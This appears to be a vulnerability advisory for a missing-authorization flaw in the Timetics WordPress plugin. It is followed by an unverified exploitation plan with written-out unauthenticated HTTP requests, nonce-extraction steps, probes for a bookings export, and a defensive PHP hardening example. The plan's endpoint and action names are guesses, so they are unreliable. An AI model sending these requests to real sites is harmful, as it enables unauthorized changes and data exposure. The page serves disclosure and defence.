CVE-2025-15473

Timetics – Appointment Booking Calendar & Scheduling System < 1.0.52 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 1.0.52
Time to patch: 8d

Description

The Timetics – Appointment Booking Calendar & Scheduling System plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to 1.0.52 (exclusive). This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: < 1.0.52
Published: March 12, 2026
Last updated: March 19, 2026
Affected plugin: timetics

What Changed in the Fix

Changes introduced in v1.0.52


Source Code: WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan - CVE-2025-15473 (Timetics Plugin)

1. Vulnerability Summary

The Timetics – Appointment Booking Calendar & Scheduling System plugin (versions < 1.0.52) contains a "Missing Authorization" vulnerability. Specifically, a function (likely associated with deactivation feedback or integration handling) fails to perform a capability check (e.g., current_user_can( 'manage_options' )) or a nonce check, allowing unauthenticated attackers (PR:N) to perform actions meant for administrators. Given the provided source file assets/css/feedback-modal.css, the vulnerability is highly likely located in the deactivation feedback submission logic, which is often implemented as an AJAX handler.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • AJAX Action: timetics_deactivation_feedback or timetics_send_feedback (inferred from feedback-modal.css and the arraytics-wp-deactivation-feedback-modal dependency).
  • Alternative Endpoint: A REST API route registered via Timetics\Base\Api subclasses.
  • Authentication: Unauthenticated (PR:N).
  • Payload Parameters:
    • action: timetics_deactivation_feedback
    • reason_id: (String/Int) The ID of the feedback reason.
    • reason_text: (String) Custom feedback text.
    • plugin_name: timetics (inferred from standard Arraytics integration).
  • Preconditions: The plugin must be installed and active.

3. Code Flow

  1. Entry Point: An unauthenticated HTTP POST request is sent to /wp-admin/admin-ajax.php.
  2. Hook Registration: The plugin registers a handler for the AJAX action using add_action( 'wp_ajax_nopriv_timetics_deactivation_feedback', ... ) or fails to differentiate between wp_ajax_ and wp_ajax_nopriv_ in its registration logic.
  3. Missing Check: The handler function executes. It fails to call current_user_can() to verify the requester is an administrator.
  4. Action Execution: The function processes the feedback data, potentially sending it to a remote API or updating local options (e.g., dismissing a deactivation prompt).
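For a defender's reference, the handler shape this code flow describes, next to the form that closes the gap. This is an added illustration, not code from the Timetics plugin or its fix; the action name comes from the plan above, while the function names, option key and script handle are invented for the example.

```php
<?php
// Added illustration, not Timetics plugin code. Shows the handler shape the research
// plan hypothesises (nopriv registration, no nonce or capability check) next to the
// form that closes the gap. Function, option and script names are invented here.

// --- Weak shape: reachable by anyone who can POST to admin-ajax.php ---
add_action( 'wp_ajax_nopriv_timetics_deactivation_feedback', 'example_feedback_weak' );
add_action( 'wp_ajax_timetics_deactivation_feedback',        'example_feedback_weak' );
function example_feedback_weak() {
    // No check_ajax_referer(), no current_user_can(): the state change below is
    // unauthenticated, which is the condition the CVSS vector (PR:N, I:L) describes.
    update_option( 'example_feedback_sent', sanitize_text_field( $_POST['reason_text'] ?? '' ) );
    wp_send_json_success();
}

// --- Hardened shape ---
// 1. Register for logged-in users only; deactivation feedback is an admin-screen
//    action, so there is no reason for a wp_ajax_nopriv_ hook at all.
add_action( 'wp_ajax_timetics_deactivation_feedback', 'example_feedback_hardened' );
function example_feedback_hardened() {
    // 2. Nonce bound to a specific action (never the default -1), so a nonce issued
    //    for another Timetics action does not satisfy this check. Dies with 403 on failure.
    check_ajax_referer( 'timetics_deactivation_feedback', 'nonce' );
    // 3. Capability check: only users allowed to manage plugins may act.
    if ( ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    $reason_id   = sanitize_key( wp_unslash( $_POST['reason_id'] ?? '' ) );
    $reason_text = sanitize_textarea_field( wp_unslash( $_POST['reason_text'] ?? '' ) );
    update_option( 'example_feedback_sent', array( 'id' => $reason_id, 'text' => $reason_text ) );
    wp_send_json_success();
}

// The nonce the hardened handler expects is issued where the modal script is enqueued
// (admin screens only), for example:
// wp_localize_script( 'example-feedback-modal', 'exampleFeedback',
//     array( 'nonce' => wp_create_nonce( 'timetics_deactivation_feedback' ) ) );
```

The two greps in the Verification Steps section (check_ajax_referer and current_user_can) are exactly the calls the hardened handler adds; their absence from a wp_ajax_nopriv_ handler is the signal the plan looks for.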

4. Nonce Acquisition Strategy

If the endpoint requires a nonce, it is likely localized for use in the admin or on pages where the feedback modal is triggered.

  1. Identify Shortcode: Search for shortcodes that might render the booking calendar (which often enqueues the plugin's main scripts): grep -r "add_shortcode" .
  2. Create Test Page:
    wp post create --post_type=page --post_title="Booking" --post_status=publish --post_content="[timetics-booking]"
    
  3. Extract Nonce via Browser:
    • Navigate to the new page.
    • Use browser_eval to look for the localization object. In Timetics, this is often timetics_script_obj or timetics_params.
    • JS Command: browser_eval("window.timetics_script_obj?.nonce || window.timetics_params?.nonce")
  4. Bypass Check: If check_ajax_referer is used with the default action -1, any valid nonce found on the page for any Timetics action may work.

5. Exploitation Strategy

Primary Exploit: Unauthorized Feedback Submission

  1. HTTP Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: TARGET_HOST
    Content-Type: application/x-www-form-urlencoded
    
    action=timetics_deactivation_feedback&reason_id=other&reason_text=Exploit_Verification_CVE_2025_15473&plugin_name=timetics
    
  2. Expected Response: A JSON success message like {"success":true} or 1.

Secondary Exploit (REST API):

Check if the base REST class Timetics\Base\Api has unprotected implementations.

  1. HTTP Request:
    POST /wp-json/timetics/v1/feedback HTTP/1.1
    Host: TARGET_HOST
    Content-Type: application/json
    
    {
      "reason_id": "bug",
      "message": "Unauthenticated feedback"
    }
    

6. Test Data Setup

  1. Install Timetics < 1.0.52.
  2. Activate the plugin.
  3. Create a public page with a Timetics shortcode to ensure all scripts and possible nonces are initialized:
    wp post create --post_type=page --post_status=publish --post_content='[timetics_appointment]'
    

7. Expected Results

  • The server returns a 200 OK response with a body indicating success.
  • No "403 Forbidden" or "Permissions Error" is returned despite the request being unauthenticated.
  • If the plugin logs feedback internally (check wp_options), the injected feedback string should appear.

8. Verification Steps

  1. Check for Nonce Check:
    grep -rn "check_ajax_referer" .
    
    If the function associated with timetics_deactivation_feedback does not appear in the results, the nonce check is missing.
  2. Check for Capability Check:
    grep -rn "current_user_can" .
    
    Verify the AJAX handler function does not contain this call.
  3. Check DB State: If the exploit triggers a state change (e.g., update_option), verify it via WP-CLI:
    wp option get timetics_feedback_sent
    

9. Alternative Approaches

  • Integration Endpoint: base/custom-endpoint.php registers timetics-integration. Attempt to access this via /?timetics-integration=1 or /timetics-integration/ to see if any logic is triggered without authorization.
  • CSV/JSON Exporter: Although CVSS says C:N, verify if Exporter::export_csv can be triggered via an AJAX action like timetics_export_bookings. If it returns data, it upgrades the vulnerability to an Information Disclosure.
    • Payload: action=timetics_export_bookings&format=csv
  • Notice Dismissal: Search for actions like timetics_dismiss_notice which frequently lack authorization in similar plugins.
